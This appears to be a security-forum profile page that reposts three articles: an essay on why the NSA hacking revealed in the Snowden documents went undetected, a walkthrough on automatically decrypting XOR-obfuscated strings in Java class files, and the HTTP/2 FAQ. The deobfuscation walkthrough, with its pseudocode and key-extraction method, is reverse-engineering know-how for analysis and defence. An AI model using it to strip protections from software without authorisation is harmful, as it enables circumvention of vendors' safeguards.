Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. Ba. Inainte de a face informatii publice aduceti si dovezi.
  2. If the NSA has been hacking everything, how has nobody seen them coming? As the Snowden leaks continue to dribble out, it has become increasingly obvious that most nations planning for "cyber-war" have been merely sharpening knives for what looks like an almighty gunfight. We have to ask ourselves a few tough questions, the biggest of which just might be: "If the NSA was owning everything in sight (and by all accounts they have) then how is it that nobody ever spotted them?” The Snowden docs show us that high value targets have been getting compromised forever, and while the game does heavily favour offence, how is it possible that defence hasn't racked up a single catch? The immediate conclusions for defensive vendors is that they are either ineffective or, worse, wilfully ignorant. However, for buyers of defensive software and gear, questions still remain. The last dump, published by The Spiegel on the 17th of January went by pretty quietly (compared to previous releases) but the PDFs released contain a whole bunch of answers that might have slipped by un-noticed. We figured it would probably be worth discussing some of these, because if nothing else, they shine a light on areas defenders might have been previously ignoring. (This is especially true if you play at a level where nation state adversaries form part of your threat model. (and, as the leaks show, NSA targets commercial entities like mobile providers, so it’s not just the domain of the spooks.) The purpose of this post isn’t to discuss the legality of the NSA's actions or the morality of the leaks, what we are trying to answer is: "Why did we never see it coming?" We think that the following reasons help to explain how this mass exploitation remained under the radar for so long: 1. Amazing adherence to classification/secrecy oaths; 2. You thought they were someone else; 3. You were looking at the wrong level; 4. Some beautiful misdirection; 5. They were playing chess & you were playing checkers; 6. Your "experts" failed you miserably. 1. Amazing adherence to classification/secrecy oaths; The air of secrecy surrounding the NSA has been amazingly impressive and until recently, they had truly earned their nickname of "No Such Agency." A large number of current speakers/trainers/practitioners in infosec have well acknowledged roots in the NSA. It was clear from their skill-sets and specialities that they were obviously involved with CNE/CNO in their previous lives. If one were to probe deeper, one could make even more guesses as to the scope of their previous activities (and by inference we would have obtained a low resolution snapshot of NSA activities) [TABLE] [TR] [TD] [/TD] [TD] [/TD] [TD] [/TD] [/TR] [TR] [TD] Dave Aitel Fuzzing & Exploit frameworks [/TD] [TD] Jamie Butler Rootkits & Memory Corruption [/TD] [TD] Charlie Miller Fuzzing & Exploitation [/TD] [/TR] [/TABLE] Reading through the Snowden documents, a bunch of "new" words has been introduced into our lexicon. Interdictionwas relatively unheard of, and the the word "implant" was almost never used in security circles, but has now fairly reliably replaced the ageing "rootkit". We have read the documents for a few hours and have adopted these words, but ex-NSA’ers have clearly lived with these words for years of their service. That the choice of wording has not bled far beyond the borders at Fort Meade is interesting and notable. It is an amazing adherence to classification and secrecy, deserves admiration and has likely helped the NSA keep some of its secrets to date. (This is to be expected when innovation occurs out of sight, terminology diverges. When GCHQ cryptographers conceived early public-key crypto they called it “non-secret cryptography”, however this was only revealed many years after “public-key” had become commonplace. Now that “implant” is in the public domain (and is associated with NSA), there seems little reason for vendors to continue with “rootkit”.) 2. You thought they were someone else; Skilled adversaries operating under cover of a rioting mob is hardly a new tactic, and when one considers how much "bot" related activity is seen on the Internet, hiding amongst it is an obviously useful technique. The dump highlights two simple examples where the NSA leverages this technique. Performing "4th party collection" we essentially have the NSA either passively, or actively stealing intelligence from other intelligence agencies performing CNE. The fact that the foreign CNE can be parasitically leeched, actively ransacked or silently repurposed, means that even attacks that use malware belonging to country-X, using TTP's that strongly point to country-X could just be activity that should be attributed to the 4th party collection program. Of course theres no need for the NSA to limit themselves to just making use of foreign intelligence agencies. ThroughDEFIANTWARRIOR you see them making active use of general purpose botnets too. With some details on how botnet hijacking works (sometimes in coordination with the FBI) their slides also offer telling advice on how to make use of this channel: This raises two interesting points that are worth pondering. The first (obvious) one, is that even regular cybercrime botnet activity could be masking a more comprehensive form of penetration and the second is how much muddier it makes the waters of attribution. For the past few years, a great deal has been made of how Chinese IP's have been hacking the Western World. When one considers that the same slide deck made it clear that China had by far the greatest percentage of botnets, then we are forced to be more cautious when attributing attacks to China just because they originated from Chinese IP’s. (We discussed our views on weakly evidenced China attribution previously [here] & [here]). 3. You were looking at the wrong level; A common criticism of the top tier security conferences is that they focus on attacks that are overly complex, while networks are still being compromised by un-patched servers and shared passwords. What the ANT catalogue and some of the leaks revealed, is that sensitive networks have more than enough reason to fear complex attacks too. One of the most interesting documents in this regard appears to be taken from an internal Wiki, cataloguing ongoing projects (with calls for intern development assistance). The document starts off strong, and continues to deliver: "TAO/ATO Persistence POLITERAIN (CNA) team is looking for interns who want to break things. We are tasked to remotely degrade or destroy opponent computers, routers, servers and network enabled devices by attacking the hardware using low level programming.” For most security teams, low level programming generally means shellcode and OS level attacks. A smaller subset of researchers will then aim at attacks targeting the Kernel. What we see here, is a concerted effort to aim "lower": "We are also always open for ideas but our focus is on firmware, BIOS, BUS or driver level attacks." The rest of the document then goes on to mention projects like: "we have discovered a way that may be able to remotely brick network cards... develop a deployable tool". "erase the BIOS on a brand of servers that act as a backbone to many rival governments" "create ARM-based SSD implants." "covert storage product that is enabled from a hard drive firmware modification" "create a firmware implant that has the ability to pass to and from an implant running in the OS" "implants for the newest SEAGATE drives..", "for ARM-based Hitachi drives", "for ARM-based Fujitsu drives", "ARM-Samsung drives".. "capability to install a hard drive implant on a USB drive" "pre-boot persistence.. of OSX" "EFI module.." "BERSERKR is a persistent backdoor that is implanted into the BIOS and runs from SMM" All of this perfectly aligns with the CNO/GENIE document which makes it clear that base resources in that project: "will allow endpoint implants to persist in target computers/servers through technology upgrades, and enable the development of new methodologies to persist and maintain presence within hard target networks". We have worked with a few companies who make religious use of whitelisting technologies and have dealt with some who would quickly discover altered system files on sensitive servers. We know a tinier subset of those who would verify the integrity of running hosts using offline examination but organizations that are able to deal with implanted firmware or subverted BIOSes are few and far between. In the absence of hardware based TPM's, this is currently a research grade problem that most people don’t even know they have. 4. Some beautiful misdirection; Even if we were completely underprepared as defenders, one would think that those cases where implants were communicating back to the NSA would have been discovered (even if by accident) sooner or later. Once more, the documents reveal why this would not have resulted in the classic "smoking gun”. A common IR process when an attack has been discovered is to determine where the exfiltrated data is going to. In the most simplistic case (or if big budget movies are involved) this simple step could allow an analyst to say: “The data from this compromised host is going to HOST_B in country_X. So country_X is the culprit.” Of course, since even spirited teenagers have been making use of "jump hosts" since the 90's, a variation on this would be not just to base the attribution on the location of HOST_B, but to observe who then accesses HOST_B to "collect the loot". (It's the sort of time you really want to be the "global passive adversary”). Even this would have tipped the NSA's hand sooner or later, and what we see from the docs is a clever variation on the theme: We see the use of an entire new protocol, called FASHIONCLEFT to effectively copy traffic off a network, attach metadata to it, then hide the packet within another packet allowed to exfil the targeted network. Tunnelling one type of traffic over another is not novel (although a 27 page interface control document for the protocol is cool) but this still leaves open the possibility that you would see victim_machine talking to HOST_X in Europe. This is where passive collection comes in.. This is beautiful! So the data is munged into any packet that is likely to make it out of the network, and is then directed past a passive collector. This means that we cant rely on the host the data was sent to for attribution, and even if we did completely own the last hop, to see who shows up to grab the data, we would be watching in vain, because the deed was done when the packets traversed a network 3 hops ago. This really is an elegant solution and a beautiful sleight of hand. With the NSA controlling tens of thousands of passive hosts scattered around the Internet, good luck ever finding that smoking gun! (in their own words) 5. They were playing chess & you were playing checkers; Whats very clear from the breadth of the information is just how out of their depth, so many of the other players at this table are. Many are hilariously outgunned, playing on a field that has already been prepared, using tools that have already been rigged... and whats worse, is that many of them don’t even know this. In 2010, we gave a presentation at the CCDCOE in Estonia to NATO folks. Our talk was titled: "Cyberwar - Why your threat model is probably wrong!" (The talk has held up relatively well against the revelations, and is worth a quick read, even thought it predated the discovery of STUXNET) One of the key take aways from the talk (aside from the fact that any expert who referred to DDoS attacks when talking about cyberwar should be taken with a pinch of salt) was that real attackers build toolchains. Using examples from our pen-testing past, we pointed out how most of the tools we built went into modular toolchains. We mentioned that more than anything else, robust toolchains were the mark of a "determined, sponsored adversary”. Our conclusions from the talk were relatively simple: The nature of the game still heavily favours offence, and attacker toolchains were likely much more complex than the "sophisticated attacks" we had seen to date. When you look at the Snowden documents, if there is one word they scream, its toolchains: If there are two words, its "sophisticated toolchains" The USA (and their Five Eyes partners) were clearly way ahead of the curve in spotting the usefulness of the Internet for tradecraft and, true to the motto of U.S cyber command have been expending resources to ensure "global network dominance". While organizations all over the world have struggled over the past few years to stand up SoC's (security operations centers) to act as central points for the detection and triage of attacks, the documents introduce us (for the first time) to its mirror image, in the form of a ROC: From [media-35654.pdf]: In terms of ROC capacity, the documents show us that in 2005, the ROC was 215 people strong running a hundred active campaigns per day - In 2005! (thats generations ago in Internet years). In an op-ed piece we penned for Al Jazeera in 2011, we mentioned that nation states following the headlines about the US training tons of cyber warriors (with the CEH certification of all things) would be gravely mistaken, that offensive capability had been brought to bear on nation-states, long before the official launch of US Cybercom and these docs validate those words. In fact, if you are a nation state dipping your toes in these waters, its worth considering the documented budgets for project GENIE which we mentioned earlier. With an admittedly ambitious stated goal to "plan, equip and conduct Endpoint operations that actively compromise otherwise intractable targets" we can guess that project GENIE would cost a bit. Fortunately, we don’t have to guess, and can see that in 2011, GENIE alone cost $615MM, with a combined headcount of about 1500 people. JUST. FOR. PROJECT. GENIE. Of course while debate rages about the morality of governments buying 0days (and while some may think this is a new concept) the same document shows that back in 2012, about $25MM was set aside for "community investment" & "covert purchases of software vulnerabilities". $25MM buys a whole lot of 3rd party 0day. The possibly asymmetric nature of cyberwar means that small players are able to possibly punch above their weight-class. What we see here, is proof positive that the biggest kid in the room has been working on their punching for a long time… 6. Your "experts" failed you miserably. The snowden leaks crossed over from infosec circles into the global zeitgeist which meant international headlines and soundbytes on CNN. This in turn has led to a sharp rise in the number of "CyberWar Experts" happy to trot out their opinions in exchange for their 15 minutes of fame.. VC funding is rushing to the sector and every day we see more silver bullets and more experts show up... but, it would behoove us to pause for a bit to examine the track records of these "experts". How did they hold up against yesterdays headlines? I have seen 6 figure consultants trying to convince governments that 0days are never used and have seen people talk of nation state hacking with nothing more than skinned metasploit consoles and modern versions of back-orrifice. How many of the global "threat intelligence" companies are highlighting TTPS actually in use by APEX predators (instead of merely spotting low hanging fruit). If they are not, then we need to conclude that they are either uninformed or complicit in deluding us and either option should cap the exorbitant fees many currently seek. Conclusion? The leaks give us an insight into the workings of a well refined offensive machine. The latest files show us why attributing attacks to the NSA will be difficult for a long time to come and why “safe from nation state adversaries” requires a great deal more work, by people who are qualified to do so.. If nothing else, the leaks reiterate the title from our 2010 talk.. “Cyberwar.. why your threat model is probably wrong” [if you enjoy this update, you really should subscribe to ThinkstScapes] Sursa: http://blog.thinkst.com/p/if-nsa-has-been-hacking-everything-how.html
  3. Automating Removal of Java Obfuscation By David Klein, 16 Feb. 2015 In this post we detail a method to improve analysis of Java code for a particular obfuscator, we document the process that was followed and demonstrate the results of automating our method. Obscurity will not stop an attacker and once the method is known, methodology can be developed to automate the process. Introduction Obfuscation is the process of hiding application logic during compilation so that the logic of an application is difficult to follow. The reason for obfuscation is usually a result of vendors attempting to protect intellectual property, but serves a dual purpose in slowing down vulnerability discovery. Obfuscation comes in many shapes and forms, in this post we focus on a particular subset: strings obfuscation; more specifically, encrypted string constants. Strings within an application are very useful for understanding logic, for example logging strings and exception handling is an excellent window into how an application handles certain state and can greatly speed up efforts to understand functionality. For more information on what obfuscation is within the context of Java, see [0]. Note that the following entry assumes the reader has a rudimentary understanding of programming. Decompilation Firstly, we extract and load the Java archive (jar) using the tool JD-GUI [1] (a Windows based GUI tool that decompiles Java “.class” files), this is done by drag-dropping the target jar into the GUI window. The following is what is shown after scrolling down to an interesting looking class: Figure 1 - JD-GUI showing the output from the disassembly The first observation we can make is that JD-GUI has not successfully disassembled the class file entirely. The obfuscator has performed some intentional modifications to the bytecode which has hampered disassembly. If we follow the sequence of events in the first z function we can see that it does not flow correctly, incorrect variables are used where they shouldn’t be, and a non-existing variable is returned. The second z function also seems very fishy; the last line is somehow indexing into an integer, which is definitely not allowed in Java. Screenshot shown below. Figure 2 - Showing the suspicious second 'z' function Abandoning JD-GUI and picking up trusty JAD [2] (a command line Java .class decompiler) yields better results, but still not perfect: Figure 3 - Showing the output that JAD generates We can see that disassembly has failed as JAD inserts the JVM instructions (as opposed to high level Java source); in fact JAD tells us as such in the command line output. Fortunately it appears that the decoding failures only exist in a consistent but limited set of functions and not the entire class. Secondly, we can see that the strings are not immediately readable; it is quite obvious that there is some encryption in use. The decryption routine appears to be the function z, as it is called with the encrypted string as the input. As shown in Figure 2 there are two functions sharing the name (z), this is allowed in Object Oriented languages (Function Overloading [3]) and it is common for obfuscators to exploit such functionality. It is however possible to determine the true order of the called functions by looking at the types or the count of the parameters. Since our first call to z provides string as the parameter, we can derive the true order and better understand its functionality. We can see in Figure 4 (below) that the first z converts the input string ‘s’ to a character array: if the length of the array is 1 it performs a bitwise XOR with 0x4D, otherwise it returns the char array as-is. JAD was unable to correctly disassemble the function, but in this case such a simple function is easy to analyse. Figure 4 - Showing the first 'z' function The second z function (seen in Figure 5 below) appears to be where the actual decryption is done. Figure 5 - Second 'z' function, highlighting the interesting integer values To know what happens with the input we must understand that Java is a stack based language. Operations are placed on the stack and operated upon when unrolled. The first important instruction we see is that the variable i is set to 0; we then see the instruction caload, which loads a character from an array at a given index. While JAD has not successfully decompiled it, we can see that the index is the variable i and the array is the input character array ac (and in fact, ac pushed onto the stack at the very start of our function). Next, there is a switchstatement, which determines the value of byte0. After the switch statement, byte0 is pushed onto the stack. For the first iteration, its value will be value 0x51. The proceeding operations perform a bitwise XOR between the byte0 value and the character in ac at index i, Then i is incremented and compared with the length of ac, if the index is greater than the length of ac, the ac array is converted to a string and returned, if the index is less thank the length of ac the code jumps back to L3 and performs another iteration on the next index. In summary, this z function takes the input and loops over it, taking the current index within the input and performing a bitwise XOR against a key that changes depending on the current index. We also note that there is a modulus 5 function involved against the current index, indicating that there are 5 possible keys (shown in red in Figure 5). To neaten this up, we will convert the second z to pseudocode: keys = [81,54,2,113,77] // below input is "#Sq\0368#Ug\002b\"Oq\005(<\030r\003\"!Sp\005$4E" input = [ 0x23, 0x53, 0x71, 0x1e, 0x38, 0x23, 0x55, 0x67, 0x02, 0x62, 0x22, 0x4f, 0x71, 0x05, 0x28, 0x3c, 0x18, 0x72, 0x03, 0x22, 0x21, 0x53, 0x70, 0x05, 0x24, 0x34, 0x45 ] for i in 0..input.length-1 do printf "%c" (keys[i%keys.length] ^ input) As you can see from the above code, it converts to a simple loop that performs the bitwise XOR operation on each character within theinput string; we have replaced the switch with an index into the keys array. The code results in the string "resources/system.properties" being printed - not at all an interesting string - but we have achieved decryption. Problem analysis With knowledge of the key and an understanding of the encryption algorithm used, we should now be able to extract all the strings from the class file and decrypt them. Unfortunately this approach fails; this is a result of each class file within the Java archive using a different XOR key. To decrypt the strings en-masse, a different approach is required. Ideally, we should programmatically extract the key from every class file, and use the extracted key to decrypt the strings within that file. One approach could be to perform the disassembly using JAD, and then write a script to extract out the switch table – which holds the XOR key - and the strings using regexes. This would be reasonably simple but error prone and regex just does not seem like an elegant solution. An alternative approach is to write our own Java decompiler which gives us a nice abstracted way of performing program analysis. With a larger time investment, this is certainly a more elegant solution. To perform this task, we chose the second option. As it turns out, the JVM instruction set is quite simple to parse and is well documented [4, 5, and 6], so the process of writing the disassembler was not difficult. Parsing the class file - overview First we parse the class file format, extracting the constants pool, fields, interfaces, classes and methods. We then disassemble the methods body (mapping instructions to a set of opcodes), the resulting disassembly looks like the below (snippet): Figure 6 - Showing the byte to opcode translation, each section is divided into a grouping (e.g. Constants,Loads,Maths,Stack) an operation (e.g. bipush) and an optional argument (instruction dependent, such as ‘77’). As you can see, the above shows the tagged data that resulted from parsing the JVM bytecode into a list of opcodes with their associated data. Extracting encryption function We are after the switch section of the disassembled code, as this contains the XOR key that we will use to decrypt the ciphertext. We can see based on the documentation that it maps back to the instruction tableswitch [7], which is implemented as a jump table, as one would expect. Now it is a matter of mapping over the opcodes to locate the tableswitch instruction. Below is the section of the opcode list we are interested in: As you can see, the tableswitch instruction contains arguments: the first argument is the default case (67), and the second argument is the jump table, which maps a 'case' to a jump. In this example, case 0 maps to the jump 48. The last argument (not in screenshot) is the padding which we discard. Our algorithm for extracting this table is as follows: Detect if a control section contains a tableswitch. Extract the tableswitch. Extract the jumps from the tableswitch. Build a new jump table containing the original jump table with the default jump case appended on the end. We now have all the jumps to the keys. Map over the method body and resolve the jumps to values. We now have all the key values and the XOR function name. Figure 7 – Code(F#) Showing the pattern matching function which implements the algorithm to extract switch tables. Figure 8 - Showing the resulting extracted XOR keys from the switch tableThe next step is to locate the section of the class where the strings are held. In the case of this obfuscator, we have determined through multiple decompilations that the encrypted strings are stored within the static initialization section [8], which JAD generally does not handle effectively. At runtime, when the class is initialised, the strings are decrypted and the resulting plaintext is assigned to the respective variable. Extracting the static initialization section is trivial, we map over the code body and find sections where the name is `<clinit>' [9] and the descriptor is `()V' which denotes a method with no parameters that returns void [10]. Once we have extracted this, we resolve the 'private static' values making sure to only select the values where our decryption function is being called (we know the name of the function as we saved it). It is now just a process of resolving the strings within the constants pool. At this stage we have: Extracted the decryption key; The actual decryption algorithm implemented (XOR); and Encrypted strings. We can now decrypt the strings and replace the respective constant pool entry with the plaintext. Since the decryption uses a basic bitwise XOR, the plaintext length is equal to the ciphertext length, which means we don't have to worry about truncation or accidentally overwriting non relevant parts of the constant pool. Later we plan to update the variable names throughout the classes and remove the decryption functions. Figure 9 - Example decryption, plaintext bytes, cipher bytes, and plaintext result. The particular class file we chose to look at, turned out to not have any interesting strings, but we are now able to see exactly what it does. The next stage is to loop over all class files and decrypt all the strings, then analyse the results so that we can hopefully find vulnerabilities, which is a story for another day. Conclusion In conclusion, we have shown that by investing time into our reversing, we are able to have higher confidence of the functionality of the target application, and by automating the recovery of obfuscated code, we have shown that obfuscation alone is not an adequate protection mechanism, but it does slow an attacker down. In addition to the automated recovery, we now have a skeleton Java decompiler, which will eventually be lifted into our static analysis tool. Finally, we have shown that if you try hard enough, everything becomes a fun programming challenge. [0] Protect Your Java Code - Through Obfuscators and Beyond [1] Java Decompiler [2] 404 Not Found [3] Function overloading - Wikipedia, the free encyclopedia [4] https://github.com/Storyyeller/Krakatau [5] https://docs.oracle.com/javase/specs/jvms/se8/html/jvms-4.html [6] http://docs.oracle.com/javase/specs/jvms/se8/html/jvms-6.html [7] http://docs.oracle.com/javase/specs/jvms/se7/html/jvms-6.html#jvms-6.5.tableswitch [8] http://docs.oracle.com/javase/tutorial/java/javaOO/initial.html [9] http://stackoverflow.com/questions/8517121/java-vmspec-what-is-difference-between-init-and-clinit [10] http://stackoverflow.com/questions/14721852/difference-between-byte-code-initv-vs-initzv Sursa: http://www.contextis.com/resources/blog/automating-removal-java-obfuscation/
  4. HTTP/2 Frequently Asked Questions These are Frequently Asked Questions about HTTP/2. General Questions Why revise HTTP? Who is doing this? What’s the relationship with SPDY? Is it HTTP/2.0 or HTTP/2? What are the key differences to HTTP/1.x? Why is HTTP/2 binary? Why is HTTP/2 multiplexed? Why just one TCP connection? What’s the benefit of Server Push? Why do we need header compression? Why HPACK? Can HTTP/2 make cookies (or other headers) better? What about non-browser users of HTTP? Does HTTP/2 require encryption? What does HTTP/2 do to improve security? Can I use HTTP/2 now? Will HTTP/2 replace HTTP/1.x? Will there be a HTTP/3? [*]Implementation Questions Why the rules around Continuation on HEADERS frames? What is the minimum or maximum HPACK state size? How can I avoid keeping state? Why is there a single compression/flow-control context? Why is there an EOS symbol in HPACK? [*]Deployment Questions How do I debug HTTP/2 if it’s encrypted? General Questions Why revise HTTP? HTTP/1.1 has served the Web well for more than fifteen years, but its age is starting to show. Loading a Web page is more resource intensive than ever (see the HTTP Archive’s page size statistics), and loading all of those assets efficiently is difficult, because HTTP practically only allows one outstanding request per TCP connection. In the past, browsers have used multiple TCP connections to issue parallel requests. However, there are limits to this; if too many connections are used, it’s both counter-productive (TCP congestion control is effectively negated, leading to congestion events that hurt performance and the network), and it’s fundamentally unfair (because browsers are taking more than their share of network resources). At the same time, the large number of requests means a lot of duplicated data “on the wire”. Both of these factors means that HTTP/1.1 requests have a lot of overhead associated with them; if too many requests are made, it hurts performance. This has led the industry to a place where it’s considered Best Practice to do things like spriting, data: inlining, domain sharding and concatenation. These hacks are indications of underlying problems in the protocol itself, and cause a number of problems on their own when used. Who made HTTP/2? HTTP/2 was developed by the IETF’s HTTP Working Group, which maintains the HTTP protocol. It’s made up of a number of HTTP implementers, users, network operators and HTTP experts. Note that while our mailing list is hosted on the W3C site, this is not a W3C effort. Tim Berners-Lee and the W3C TAG are kept up-to-date with the WG’s progress, however. A large number of people have contributed to the effort, but the most active participants include engineers from “big” projects like Firefox, Chrome, Twitter, Microsoft’s HTTP stack, Curl and Akamai, as well as a number of HTTP implementers in languages like Python, Ruby and NodeJS. To learn more about participating in the IETF, see the Tao of the IETF; you can also get a sense of who’s contributing to the specification on Github’s contributor graph, and who’s implementing on our implementation list. What’s the relationship with SPDY? HTTP/2 was first discussed when it became apparent that SPDY was gaining traction with implementers (like Mozilla and nginx), and was showing significant improvements over HTTP/1.x. After a call for proposals and a selection process, SPDY/2 was chosen as the basis for HTTP/2. Since then, there have been a number of changes, based on discussion in the Working Group and feedback from implementers. Throughout the process, the core developers of SPDY have been involved in the development of HTTP/2, including both Mike Belshe and Roberto Peon. In February 2015, Google announced its plans to remove support for SPDY in favor of HTTP/2. Is it HTTP/2.0 or HTTP/2? The Working Group decided to drop the minor version (“.0”) because it has caused a lot of confusion in HTTP/1.x. In other words, the HTTP version only indicates wire compatibility, not feature sets or “marketing.” What are the key differences to HTTP/1.x? At a high level, HTTP/2: is binary, instead of textual is fully multiplexed, instead of ordered and blocking can therefore use one connection for parallelism uses header compression to reduce overhead allows servers to “push” responses proactively into client caches Why is HTTP/2 binary? Binary protocols are more efficient to parse, more compact “on the wire”, and most importantly, they are much less error-prone, compared to textual protocols like HTTP/1.x, because they often have a number of affordances to “help” with things like whitespace handling, capitalization, line endings, blank links and so on. For example, HTTP/1.1 defines four different ways to parse a message; in HTTP/2, there’s just one code path. It’s true that HTTP/2 isn’t usable through telnet, but we already have some tool support, such as a Wireshark plugin. Why is HTTP/2 multiplexed? HTTP/1.x has a problem called “head-of-line blocking,” where effectively only one request can be outstanding on a connection at a time. HTTP/1.1 tried to fix this with pipelining, but it didn’t completely address the problem (a large or slow response can still block others behind it). Additionally, pipelining has been found very difficult to deploy, because many intermediaries and servers don’t process it correctly. This forces clients to use a number of heuristics (often guessing) to determine what requests to put on which connection to the origin when; since it’s common for a page to load 10 times (or more) the number of available connections, this can severely impact performance, often resulting in a “waterfall” of blocked requests. Multiplexing addresses these problems by allowing multiple request and response messages to be in flight at the same time; it’s even possible to intermingle parts of one message with another on the wire. This, in turn, allows a client to use just one connection per origin to load a page. Why just one TCP connection? With HTTP/1, browsers open between four and eight connections per origin. Since many sites use multiple origins, this could mean that a single page load opens more than thirty connections. One application opening so many connections simultaneously breaks a lot of the assumptions that TCP was built upon; since each connection will start a flood of data in the response, there’s a real risk that buffers in the intervening network will overflow, causing a congestion event and retransmits. Additionally, using so many connections unfairly monopolizes network resources, “stealing” them from other, better-behaved applications (e.g., VoIP). What’s the benefit of Server Push? When a browser requests a page, the server sends the HTML in the response, and then needs to wait for the browser to parse the HTML and issue requests for all of the embedded assets before it can start sending the JavaScript, images and CSS. Server Push allows the server to avoid this round trip of delay by “pushing” the responses it thinks the client will need into its cache. Why do we need header compression? Patrick McManus from Mozilla showed this vividly by calculating the effect of headers for an average page load. If you assume that a page has about 80 assets (which is conservative in today’s Web), and each request has 1400 bytes of headers (again, not uncommon, thanks to Cookies, Referer, etc.), it takes at least 7-8 round trips to get the headers out “on the wire.” That’s not counting response time - that’s just to get them out of the client. This is because of TCP’s Slow Start mechanism, which paces packets out on new connections based on how many packets have been acknowledged – effectively limiting the number of packets that can be sent for the first few round trips. In comparison, even mild compression on headers allows those requests to get onto the wire within one roundtrip – perhaps even one packet. This overhead is considerable, especially when you consider the impact upon mobile clients, which typically see round-trip latency of several hundred milliseconds, even under good conditions. Why HPACK? SPDY/2 proposed using a single GZIP context in each direction for header compression, which was simple to implement as well as efficient. Since then, a major attack has been documented against the use of stream compression (like GZIP) inside of encryption; CRIME. With CRIME, it’s possible for an attacker who has the ability to inject data into the encrypted stream to “probe” the plaintext and recover it. Since this is the Web, JavaScript makes this possible, and there were demonstrations of recovery of cookies and authentication tokens using CRIME for TLS-protected HTTP resources. As a result, we could not use GZIP compression. Finding no other algorithms that were suitable for this use case as well as safe to use, we created a new, header-specific compression scheme that operates at a coarse granularity; since HTTP headers often don’t change between messages, this still gives reasonable compression efficiency, and is much safer. Can HTTP/2 make cookies (or other headers) better? This effort was chartered to work on a revision of the wire protocol – i.e., how HTTP headers, methods, etc. are put “onto the wire”, not change HTTP’s semantics. That’s because HTTP is so widely used. If we used this version of HTTP to introduce a new state mechanism (one example that’s been discussed) or change the core methods (thankfully, this hasn’t yet been proposed), it would mean that the new protocol was incompatible with the existing Web. In particular, we want to be able to translate from HTTP/1 to HTTP/2 and back with no loss of information. If we started “cleaning up” the headers (and most will agree that HTTP headers are pretty messy), we’d have interoperability problems with much of the existing Web. Doing that would just create friction against the adoption of the new protocol. All of that said, the HTTP Working Group is responsible for all of HTTP, not just HTTP/2. As such, we can work on new mechanisms that are version-independent, as long as they’re backwards-compatible with the existing Web. What about non-browser users of HTTP? Non-browser applications should be able to use HTTP/2 as well, if they’re already using HTTP. Early feedback has been that HTTP/2 has good performance characteristics for HTTP “APIs”, because the APIs don’t need to consider things like request overhead in their design. Having said that, the main focus of the improvements we’re considering is the typical browsing use cases, since this is the core use case for the protocol. Our charter says this about it: The resulting specification(s) are expected to meet these goals for common existing deployments of HTTP; in particular, Web browsing (desktop and mobile), non-browsers ("HTTP APIs"), Web serving (at a variety of scales), and intermediation (by proxies, corporate firewalls, "reverse" proxies and Content Delivery Networks). Likewise, current and future semantic extensions to HTTP/1.x (e.g., headers, methods, status codes, cache directives) should be supported in the new protocol. Note that this does not include uses of HTTP where non-specified behaviours are relied upon (e.g., connection state such as timeouts or client affinity, and "interception" proxies); these uses may or may not be enabled by the final product. Does HTTP/2 require encryption? No. After extensive discussion, the Working Group did not have consensus to require the use of encryption (e.g., TLS) for the new protocol. However, some implementations have stated that they will only support HTTP/2 when it is used over an encrypted connection. What does HTTP/2 do to improve security? HTTP/2 defines a profile of TLS that is required; this includes the version, a ciphersuite blacklist, and extensions used. See the spec for details. There is also discussion of additional mechanisms, such as using TLS for HTTP:// URLs (so-called “opportunistic encryption”); see the relevant draft. Can I use HTTP/2 now? HTTP/2 is currently available in Firefox and Chrome for testing, using the “h2-14” protocol identifier. There are also several servers available (including a test server from Akamai, Google and Twitter’s main sites), and a number of Open Source implementations that you can deploy and test. See the implementations list for more details. Will HTTP/2 replace HTTP/1.x? The goal of the Working Group is that typical uses of HTTP/1.x can use HTTP/2 and see some benefit. Having said that, we can’t force the world to migrate, and because of the way that people deploy proxies and servers, HTTP/1.x is likely to still be in use for quite some time. Will there be a HTTP/3? If the negotiation mechanism introduced by HTTP/2 works well, it should be possible to support new versions of HTTP much more easily than in the past. Implementation Questions Why the rules around Continuation on HEADERS frames? Continuation exists since a single value (e.g. Set-Cookie) could exceed 16KiB - 1, which means it couldn’t fit into a single frame. It was decided that the least error-prone way to deal with this was to require that all of the headers data come in back-to-back frames, which made decoding and buffer management easier. What is the minimum or maximum HPACK state size? The receiver always controls the amount of memory used in HPACK, and can set it to zero at a minimum, with a maximum related to the maximum representable integer in a SETTINGS frame, currently 2^32 - 1. How can I avoid keeping HPACK state? Send a SETTINGS frame setting state size (SETTINGS_HEADER_TABLE_SIZE) to zero, then RST all streams until a SETTINGS frame with the ACK bit set has been received. Why is there a single compression/flow-control context? Simplicity. The original proposals had stream groups, which would share context, flow control, etc. While that would benefit proxies (and the experience of users going through them), doing so added a fair bit of complexity. It was decided that we’d go with the simple thing to begin with, see how painful it was, and address the pain (if any) in a future protocol revision. Why is there an EOS symbol in HPACK? HPACK’s huffman encoding, for reasons of CPU efficiency and security, pads out huffman-encoded strings to the next byte boundary; there may be between 0-7 bits of padding needed for any particular string. If one considers huffman decoding in isolation, any symbol that is longer than the required padding would work; however, HPACK’s design allows for bytewise comparison of huffman-encoded strings. By requiring that the bits of the EOS symbol are used for padding, we ensure that users can do bytewise comparison of huffman-encoded strings to determine equality. This in turn means that many headers can be interpreted without being huffman decoded. Can I implement HTTP/2 without implementing HTTP/1.1? Yes, mostly. For HTTP/2 over TLS (h2), if you do not implement the http1.1 ALPN identifier, then you will not need to support any HTTP/1.1 features. For HTTP/2 over TCP (h2c), you need to implement the initial upgrade request. h2c-only clients will need to generate a request an OPTIONS request for “*” or a HEAD request for “/” are fairly safe and easy to construct. Clients looking to implement HTTP/2 only will need to treat HTTP/1.1 responses without a 101 status code as errors. h2c-only servers can accept a request containing the Upgrade header field with a fixed 101 response. Requests without the h2c upgrade token can be rejected with a 505 (HTTP Version Not Supported) status code that contains the Upgrade header field. Servers that don’t wish to process the HTTP/1.1 response should reject stream 1 with a REFUSED_STREAM error code immediately after sending the connection preface to encourage the client to retry the request over the upgraded HTTP/2 connection. Deployment Questions How do I debug HTTP/2 if it’s encrypted? There are many ways to get access to the application data, but the easiest is to use NSS keylogging in combination with the Wireshark plugin (included in recent development releases). This works with both Firefox and Chrome. Sursa: https://http2.github.io/faq/
